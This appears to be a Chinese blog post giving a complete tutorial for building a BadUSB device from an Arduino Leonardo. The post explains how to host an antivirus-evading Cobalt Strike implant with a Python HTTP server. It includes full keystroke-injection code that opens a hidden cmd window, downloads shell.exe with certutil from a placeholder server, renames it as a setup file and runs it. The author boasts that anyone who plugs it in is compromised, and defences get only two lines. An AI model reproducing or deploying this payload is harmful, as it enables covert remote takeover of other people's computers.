红队社工之BadUSB

什么是BadUSB

BadUSB最早是在2014年的黑帽大会上研究人员JakobLell和Karsten Nohl提出并展示的。不同于老式的U盘病毒,它利用了USB协议中的一个漏洞,通过模拟键盘、鼠标、网卡等从而让目标电脑执行恶意代码,达到控住主机或者窃取敏感信息等目的。由于恶意代码位于U盘中的固件中,所以杀软无法访问和查杀U盘固件区域,但是如果恶意代码落盘或者恶意行为可以被监控或拦截。

BadUSB攻击方式

1.物理入侵,简单点找一些未锁屏的办公电脑挨个插入。2.U盘钓鱼,通过伪装成一个普通移动U盘撒向目标范围内引起目标注意。3.摆渡攻击,通常是攻击局域网内部系统,当再次插入互联网设备中敏感信息被传输。

制作BadUSB

准备开发板:(淘宝上搞一个)

2.准备开发环境:下载Ardiuno IDE

下载地址:https://cloud.codess-nas.top:5213/s/ApT2?path=%2F
在这里插入图片描述

安装成功后,打开工具 工具——开发板——开发板管理器
在这里插入图片描述

搜索Arduino AVR Boards板子进行安装
在这里插入图片描述

制作不同的badusb要安装不同的开发板模块 我们制作的是Leonardo,所以选中leonardo开发板,进行安装即可
在这里插入图片描述

选择开发版为:"Arduino leonardo 编程器:AVRISP MKLL

选择对应的端口连接

我的电脑管理——设备管理中会出现一个端口
在这里插入图片描述

在这里插入图片描述

作用

可制作蓝屏、远控、硬件烧毁…

本次实现:cs远控

目标机器默认中文输入法

在实际利用情况下,如果目标默认使用的是中文输入法,当插入badusb模拟键盘输入时,会影响正常输入。比如输入-w hidden,实际输出为-我hidden
在这里插入图片描述

解决方法

模拟KEY_CAPS_LOCK按键,在默认使用中英文输入法时都适用,唯一不适应的情况是对方默认使用中文输入法且开启了大写输入。

cs免杀马

使用在线工具库生成cs免杀马

将cs免杀马上传到服务器上,开启http服务,供后面下载使用。

3.x>Python >= 2.4 开启http服务

python -m SimpleHTTPServer 9899

图片

键盘操作流程

首先按下win+r键,打开cmd,下载放在服务器上的免杀马(http://xxx.xxx.xxx:9899/shell.exe),执行免杀马,cs上线。

编译烧录

把代码编译烧录到badusb

#include<Keyboard.h>

void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd /t:01 /k @echo off && mode con:cols=15 lines=1");
  delay(200); 
  Keyboard.println("certutil -urlcache -split -f http://xxx.xxx.xxx:9899/shell.exe C:\\setup_11.5.0.exe");  //下载shell到本地,重命名
  delay(1000);
  delay(1000);
  Keyboard.println("c:\\setup_11.5.0.exe");
  delay(500);
  Keyboard.println("c:\\setup_11.5.0.exe");
  delay(500);
  Keyboard.println("exit");
  delay(500);
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键 我们再次关闭开启的大写键
  delay(400);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}

图片
点击✅,输出没有报错,我们直接点击➡️烧录进badusb即可制作成功就可以愉快的玩耍了

插谁谁上线,这里仅展示几张成功上线的图片
在这里插入图片描述

配合server酱非常好用
在这里插入图片描述

防御措施

1.不插陌生的USB设备。2.使用360的SecUSB或者腾讯的SecLine。

  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Goby红队版POC是一个专门为红队渗透测试设计的工具。红队渗透测试是指模拟攻击者的技术和策略来评估组织的网络安全防御能力,并识别潜在的漏洞和弱点。Goby红队版POC通过发现、测试和利用网络系统和应用程序中的漏洞,帮助安全团队更好地保护组织的网络。 Goby红队版POC的主要功能包括漏洞扫描、漏洞检测和漏洞利用。它可以扫描网络目标,查找可能存在的漏洞,并生成详细的报告。与传统的漏洞扫描工具不同,Goby红队版POC还具备漏洞检测的能力,可以通过发送特定的网络数据包来检测目标系统的漏洞。同时,它还提供了漏洞利用的功能,可以自动化地利用漏洞攻击目标系统,以验证漏洞的存在性,并帮助安全团队修补这些漏洞。 Goby红队版POC还具备一个直观的用户界面,使安全团队能够方便地管理和执行渗透测试任务。它提供了多种方式来配置和管理扫描任务,包括选择扫描目标、设置扫描选项、编写自定义POC等。同时,它还支持生成漏洞报告,以便安全团队更好地识别和修补漏洞。 总之,Goby红队版POC是一款功能强大的红队渗透测试工具,能够帮助安全团队发现和利用网络系统和应用程序中的漏洞,提高组织的网络安全防御能力。它的直观用户界面和丰富的功能使得安全团队能够更加高效地管理和执行渗透测试任务,并根据测试结果采取相应的修补措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值